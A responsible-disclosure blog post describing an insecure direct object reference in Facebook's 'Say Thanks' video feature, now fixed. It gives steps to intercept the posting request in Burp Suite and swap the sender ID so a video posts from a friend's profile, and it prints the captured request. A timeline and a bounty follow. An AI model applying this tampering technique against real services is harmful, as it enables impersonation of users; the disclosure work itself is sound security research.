[Responsible disclosure] Hacking Facebook.com/thanks Posting on behalf of your friends!

Note: This is being published with the permission of Facebook under the responsible disclosure policy. The vulnerability is now fixed.

Facebook recently introduced "Say Thanks", an experience that lets Facebook user to create personalized video cards for their facebook friends. 

To create a Thanks video, a user needs to visit facebook.com/thanks and have to choose a friend. A user can select a different theme and edit photos and posts that represent their friendship.
Once you are ready you have to click on the "Share" button and your video will be shared on your timeline with the friend tagged. It will show up on your's as well as the friend's timeline.

So, I started digging up as soon as "Say Thanks" was launched.

Below are the few things that I tried :

1) Posting on the behalf of non-Facebook friend.
2) Posting on the behalf of a Facebook friend.

Interestingly, posting on behalf of your Facebook friends worked.
After the successful exploitation a video was posted from victim's profile saying thanks.

Bug type: Insecure direct object reference (OWASP A4)

Steps to reproduce:

1) Go to https://www.facebook.com/thanks
2) Choose any friend from your list. Now on the top up corner click on "Share video" option.
3)  Now before posting make sure Burp Suite's Interceptor is turned on to capture the request. 

Click on "Post Video" now, you will see below kind of request in Burp suite:

POST /thanks/send/async/ HTTP/1.1

Host: www.facebook.com

fb_dtsg=YYYYYY&message_text=Hey Anand, I made you a video to say thanks for being such a good friend. You can make your own at facebook.com/thanks #saythanks&message=Hey @[1234543:Anand], I made you a video to say thanks for being such a good friend. You can make your own at facebook.com/thanks #saythanks&cache_version=24&content=[]&content_count=0&receiver={"id":1234543,"fbid":1234543,"name":"Anand Prakash","imageURL":"","gender":2,"greeting":"Hey Anand","shortName":"Anand","relationship":-1,"relationshipName":null,"firstName":"Anand","genderType":"MALE","profilePhoto":"","profilePhotoID":8359028035,"profilePhotoBegin":"}&sender={"id":131232524,"name":"Sunil Bhati","firstName":"Sunil","genderType":"MALE","profilePhoto":"","profilePhotoID":,"profilePhotoBegin":"","profilePhotoBeginID":328985902339}&timestamp=1417279810172&theme_details={}&theme_id=DEFAULT_THEME&privacyx=9238943&__user=1234543__a=1&__dyn=&__req=13&ttstamp=__rev=1512134

4) I changed the sender={id=XXXXX to victim's Facebook ID (here XXXXX) and in few seconds video got posted from the victim's Facebook profile.


Nov 14, 2014 12:41am - Report Sent to Facebook Security team
Nov 14, 2014 2:00am   - Initial Reply from Mordecai saying he is not able to reproduce the                                     issue
Nov 14, 2014 8:17am   - Confirmation of vulnerability from Neal Poole
Nov 14, 2014 10:42am - Issued fixed by Facebook
Nov 14, 2014 11:44am - Fix verification by me
Nov 19, 2014 10:10am - Bounty of $12,500 awarded by Facebook.

Thanks to Facebook security team for quickly fixing the issue.

Popular posts from this blog

How I took control of your Twitter account (tweeting, viewing/deleting photos and other media)

[Responsible disclosure] How I could have hacked all Facebook accounts

How anyone could have used Uber to ride for free!